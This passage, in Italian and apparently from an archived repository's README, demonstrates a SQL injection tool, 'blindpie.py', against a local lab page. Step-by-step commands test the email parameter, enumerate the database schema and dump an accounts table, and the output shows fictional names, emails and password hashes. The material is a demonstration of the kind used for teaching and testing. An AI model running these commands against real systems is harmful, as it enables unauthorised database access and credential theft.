-
Esamino i parametri della richiesta GET:
$ python3 blindpie.py -u http://192.168.0.104/sqli/time_based_blind.php -p email -d [email protected] --get test --test
Lo script rileva che
email
sia vulnerabile. -
Ottengo le prime righe di
information_schema.tables
:python3 blindpie.py -u http://192.168.0.104/sqli/time_based_blind.php -p email -d [email protected] --get -M0 -T10 attack --table information_schema.tables --column table_name --param email --row 0 --rows 120
Tra le righe compare la tabella
accounts
. -
Ottengo le prime righe di
information_schema.columns
:$ python3 blindpie.py -u http://192.168.0.104/sqli/time_based_blind.php -p email -d [email protected] --get -M0 -T5 attack --table information_schema.columns --column "concat(table_name, char(32), column_name)" --param email --row 0 --rows 50
Nota: char(32) corrisponde al carattere 'spazio'.
Ogni riga ritornata dallo script è una coppia
(table_name, column_name)
. Cercando le righe in cui compare la tabellaaccounts
si determinano i nomi delle sue colonne. -
Estraggo tutti i dati della
accounts
:$ python3 blindpie.py -u http://192.168.0.104/sqli/time_based_blind.php -p email -d [email protected] --get -M0 -T10 attack --table accounts --column "concat(id, char(32), first_name, char(32), last_name, char(32), email, char(32), password)" --param email --row 0 --rows 10
Output:
... > RESULTS: 1 Arthur Dent [email protected] d00ee262cdcbe7543210bb85f6f1cac257b4e994 2 Ford Prefect [email protected] 30f5cc99c17426a0d28acf8905c6d776039ad022 3 Tricia McMillan [email protected] bcb3358e273b5772ee0ae1799b612e13cc726b04 4 Zaphod Beeblebrox [email protected] 0c38530eaca4dbc0f49c459c0c52b362f14215c3 ...
This repository has been archived by the owner on Oct 16, 2022. It is now read-only.